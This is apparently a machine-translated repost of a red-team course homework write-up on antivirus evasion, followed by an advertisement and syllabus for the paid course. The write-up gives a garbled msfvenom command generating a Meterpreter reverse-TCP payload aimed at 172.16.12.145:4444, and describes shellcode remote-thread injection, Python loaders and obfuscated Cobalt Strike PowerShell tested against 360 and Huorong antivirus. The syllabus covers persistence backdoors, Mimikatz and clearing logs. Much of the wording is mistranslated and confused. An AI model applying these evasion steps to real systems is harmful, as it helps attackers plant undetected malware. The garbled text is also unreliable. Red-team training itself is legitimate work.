防火墙 火绒,常见的防火墙系统
• 经验
防火墙 火绒,常见的防火墙系统
文章来源MS08067 红队培训班第12节课作业
作者:汤浩荡
(红队训练一班)
按老师要求尝试完成布置的作业如下:
环境准备:
Kali linux安装cs4.2,Windows7系统安装tinder杀毒和360杀毒。为了避免查杀,防止网络查杀,关闭网络连接。
一.Shellcode远程线程注入
1.MSF生成C特洛伊木马
msfvenom - list编码器
//检查编码模块。经过测试,x86和x64都不能用,会导致无法上线。
MSF venom-p Windows/Meter Preter/Reverse _ TCP LHost=172 . 16 . 12 . 145 port=4444-ECMD/PowerShell _ Base64-i5-fC-O2 . c//-E指定编码方式,-i指定编码次数,-F指定生成的文件类型。
2.复制外壳代码内容,并注入。用loader中的远程线程生成免杀处理代码gedit1.c。
//用C语言编辑生成的木马,复制外壳代码。
使用vs2019构建项目,并生成源代码。cpp(内容是远程线程注入。c),替换shellcode,用mt多线程替换编译运行时。
3.对生成的免杀代码进行免杀测试,结果如下:
传而不杀!
二.python加载器
这种免删除方法继续使用以前生成的外壳代码,并使用记事本替换双引号,x和rn
然后替换加载程序中的外壳代码部分,如下图所示:
使用pyinstaller将py文件生成为exe文件。
复制exe文件,用tinder和360进行免杀测试。结果如下:
这种方法没能杀死火绒。
三.无文件落地免杀技术
cs生成powershell联机命令
复制powershell代码,把hex和ladon7.0混淆。
复制双引号内的混淆代码,转到key.ps1进行免杀测试。
天鹅绒无杀伤失败
-四.掩日免杀框架
直接运行3.1.2.exe软件。如果需要gcc运行环境,直接从github下载。安装环境的时候注意去掉。
方法很简单,把文件拖到运行窗口就行了。目前cs代码只支持C格式的免杀和免杀测试,如下:
天鹅绒没能杀人。
总结:目前仅shellcode远程注入方式生成的exe通过了360和火绒的免杀,golang加载器、dll load shellcode暂不进行尝试,进行作业后实验,三件套已经做过实验,效果太差,不进行详细过程编写。
10.1
号
红队攻防 第3期 预招
课程费用
第三届价格为2699
,8月底前报名享受
早鸟价:
2399
(前40名学生可获得内网知识星球名额499元),每名报名学生均可享受免费听课权。如果他一次听不懂,可以再来一次,后续的任何培训课他都可以听。有兴趣参加培训的同学赶紧报名吧!
学习资源
报名前40名的同学将获得内网知识星球499元。他们可以提前了解内部网渗透情况,并提供课程中需要的相关软件和环境。
上课时间
每周五、六、日的晚间 19:00-21:00 ,共21课时,为期一个半月
。如果不能按时参加直播课程,在线培训的每一门课程都会被录制成视频上传到学生区,可以随时下载观看。
上课方式
培训采用微信群答案在线直播录制的形式,不用等。注册后立即可以进入“内网星球”开始预览。
讲师介绍
讲师:A:MS08067安全实验室核心成员,原某国企安全研究员,擅长APT攻击和社会工程。
讲师:B:MS08067安全实验室核心成员,主要从事渗透测试和安全开发的研究。参加过多次全国护网行动,有多年红队经验。
全新课程大纲
全新课程目录
第1课信息收集的一般概念
被动信息收集
信息收集的一般概念及其在整个红队过程中的地位;
被动信息收集的基本结构和逻辑;
被动信息收集的常用手段(网络空间搜索、被动信息收集工具、传统搜索);
被动信息收集后的信息处理;
被动信息收集工具的基本原理以及如何编写它们;第2天主动收集信息
信息收集后的综合信息处理。
主动信息收集的基本结构和逻辑;
主动信息收集的常用手段(仅扫描nmap和扫描goby);带POC);
主动收集信息后的信息处理;
主动信息收集工具的基本原理以及如何编写它们;
如何综合处理主动信息采集和被动信息采集的信息;
如何将收集到的信息链接到下一个红队流程;
第三天社会工程
社会工程的含义和实际应用;
社会工程知识体系;
社会工程的学习方法;
第4天社会工程中的信息收集
利用社会工程收集组织目标和个人目标信息的差异及实际应用:
社会工程收集信息的常用方法;
第5课社会工程中的信息处理和识别(信息分析)互动
社会工程中常见的钓鱼方法及应用;
在社会工程中,如何根据收集到的信息,利用目标的社会属性弱点进行交互;
社会工程中获取和利用信任的方法
【信息收集和社会工程是红队进攻的重点,必须掌握。实战干货很多。前5天请不要迟到]
第6天免除杀人文件
免杀中使用的编程语言及相关知识库
程序的基本结构;
c .免于杀戮的依据;
python中使用的基础kill-free;
Win32api基金会;
c写最基本的socket;
用python写最基础的socket;第7课免除杀人文件
免杀中使用的编程语言及相关知识库
有效载荷的基本结构和编程语言的实际应用;
有效载荷的基本结构(以MSFf和CS为例);
c2的基本原理;
c用来写最基本的shellcode loader
用python写最基本的shellcode loader第8天免除杀人文件
杀毒软件的基本原理和绕过它的方法。
根据tinder静态分析的特点,分析并绕过思维;
windowsdefender的shellcode特征码特征分析及规避方法;
360动态分析的特点及绕过方法分析:
手动分析的旁路和处理;第9课Windows权限维护
Windows权限维护概述及隐藏技巧:关闭软杀;
自启动注册表;剧本;
计划任务;自启动服务;
记忆码;进程劫持;隐蔽隧道;第10天Liunx权限维护
Liunx权限维护概述及隐藏技巧:
添加用户;SUIDshell
SSH公钥和私钥;软连接;
Crontab计划任务;Strace后门Openssh后门;
隐蔽隧道;记忆码;第11天:提高Windows Intranet的能力
土豆家族提出权力;补丁权限;系统配置错误提升权限;
第三方服务权利;集团政策。Bypassuac
数据库权限;代币盗窃;收集密码,索要权利;
第12天Liunx内部网功率提升
系统内核提升能力;第三方服务权利;
数据库权限;收集密码,索要权利;
键盘记录以提高权利;Suid右边;
须藤提高权力;壳牌的反弹和增权;第13天内部网渗透
内部网渗透、正向代理和反向代理概述;
花生壳网络渗透;玻璃钢网络渗透;
Ngrok内部网渗透率;reGeorg Proxifier
向日葵代理和teamviewer;
最小化渗透概述;云功能;畴前;第14天:域内信息收集和域信任
域内信息收集概述;
域内用户组集合;域信任关系的集合;
用户目录集合;预控制日志收集;
Arp信息收集;TcpdumpSshkey集合;
明配置阅读;网络拓扑分析和判断;第15天领域渗透工具的实际使用
SetspnNslookupAdFind
Psloggendon360safebrowserdecrypt
SchtaskBackDoorWebshellregeditBypassUAC第16课票据伪造和域委托攻击
PTH认证过程分析:票据伪造攻击原理
Mimikatz实现票据伪造攻击;
领域委托原则;域委托攻击方法;第17课森林渗透
森林渗透概述及父域、子域、域间信任关系分析;大规模领域渗透思想;
预控定位;Pth注射;域信任攻击;
组策略漏洞;和网络系统漏洞;逃脱漏洞;
第18天免杀Mimikatz和bypassUAC
Mimikatz入门与实战;Mimikatz 18种避免杀戮的方法;
UAC工作原理介绍;ICMLuaUtil bypassUAC;第19天痕迹清理
Windows操作系统的痕迹清理
窗户痕迹清理的基本思路和思维逻辑:
Windows清理操作痕迹;
窗户清洁时间痕迹第20课痕迹清洁
Linux操作系统的痕迹清理
Linux痕迹清理的基本思想和思维逻辑;
清理Linux的登录痕迹;
清理Linux操作痕迹;
Lnux清理时间跟踪;
第21课
根据国内环境下云服务商的制作环境,将该班学生分为AB队。每个团队都有一个目标。为了模拟真实环境,将采用两家不同的云服务提供商(不透露具体厂商)。每个环境会开放不同的公共服务(服务的类型和数量都不一样,以避免通过模拟本地环境来攻击对方)。讲师将模拟普通用户使用两个团队的环境。攻击前我会私聊AB两队队长的登录环境,队长也会私聊我全单车的攻击平面的公开ip,以此来鉴定是否犯规,并在实战开始时向对方公布环境地址。*大纲仅供参考,会根据目前进度变化。
毕业实战
为了顺利完成课程的相关内容,学生必须提前预习相关知识点。已经报名的请购买实验室制作的书籍《内网安全攻防:渗透测试实战指南》或在赠送的MS08067实验室如何提前预习
中学习相关内容。
“内网知识星球”
书籍之间的关系
055-79000是国内第一本关于内网安全的书,2018年出版,深受校长爱好者的喜爱。这本书被定位为内部网安全的介绍,所以许多先进的技术没有包括在内。而且由于出书的特殊性,很多实际干货和想法都无法完整呈现。这本书到现在已经出版三年了,这期间出现了很多新技术。
本质上,红队的这次攻防训练和这本书没有任何关系。那本书讲的是内网,现场训练内容是红队的进攻。但如果非要有关联,也可以理解为书本技术的延伸;是本书的进阶版,实用版,干货版。
直播培训内容和 《内网渗透测试实战指南》
首先从内容上看,内网知识星球的定位是《内网安全攻防:渗透测试实战指南》配套技术的视频讲解。直播训练内容是一个全新的课程体系,本质上是不一样的。
从形式上看,知识星球是一种类似论坛的形式,更有利于圈子的交流。我们提供的视频教程需要你下载,观看,练习,才能学会。买了之后不下载,下载之后不看,看了之后不练,还是没用。现场培训的目标是让你学习,而不只是给你一堆视频教程看。我们会布置作业,批改作业,有个别答案,这也是我们设置每学期学生人数的原因。
我们非常珍惜读者对MS08067的信任。我们希望能做小而精的高质量在线培训。如果我们宣传它,把它做大,它就会变质。在这里,每个注册学生都可以享受免费重听的权利。如果一次没看懂,可以再来。如果你在实际工作中遇到问题,可以带着你的问题再听一遍。
直播培训和内网知识星球的区别
MS08067这几年在安全领域的口碑有目共睹。尤其是对校长感兴趣的学生和爱好者,做了一些有意义的事情。他们对读者是真诚的,一点虚假都没有。做星球的初衷是满足读者对书籍配套视频的需求。不像有些培训是以宣传和“卖教程”为主,我们的初心和技术能力从实验室四年出版四本原著就能看出来。
本次训练以红队进攻实战应用为主,注重实战、干货、思路、深度。负责讲解的老师也是MS08067的资深核心成员,有着多年的实际工作经验,让你学到的技术能够真正用在企业中。
很多读者告诉我,他们是从看视频和看书自学开始的,但是一旦遇到实验中的错误,就无法解决。没人回答他们不懂的技术点,也没掌握本该重点关注的技术。100%的初学者或多或少都会走一些弯路。学了1-2年,还是效率低,进步慢,有的甚至放弃了新安的贸易。学习新安需要圈子和方法,自学当然没问题。
最后说一下现在的校长培训。有很多人
详情请联系客服。
为什么选择MS08067直播培训
你距离红队大佬,只差一个决定
扫描下方二维码加入星球学习